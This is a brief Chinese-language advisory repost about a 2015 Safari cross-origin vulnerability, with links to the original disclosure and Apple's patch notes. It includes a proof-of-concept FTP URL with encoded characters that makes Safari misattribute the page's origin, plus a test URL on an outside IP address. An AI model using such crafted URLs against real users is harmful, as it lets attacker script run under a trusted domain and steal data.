Safari iOS/OS X/Windows 平台跨域漏洞 (WOOYUN)

from：http://klikki.fi/adv/safari.html

2015.4.8 苹果升级了很多漏洞，包括Safari的一个跨域漏洞

poc：

ftp://user%40ftp.attacker.tld%2Fexploit.html%[email protected]/

上面的url实际域名是ftp.attacker.tld，但是Safari会认为是apple，这样就可以通过javascript操控apple.com域的内容了。

影响版本：
Safari 7.0.4 on OS X 10.9.3
    Safari on iPhone 3GS, iOS 6.1.6
    Safari on iOS 8.1 simulator
    Safari 5.1.7 on Windows 8.1
但是测试的时候发现除了4.8之前升级的系统之外，似乎都受影响，并且手机端并没有推送补丁。

详情：https://support.apple.com/en-us/HT201222

Safari测试URL：

ftp://123.57.78.99%2fexp.html%[email protected]/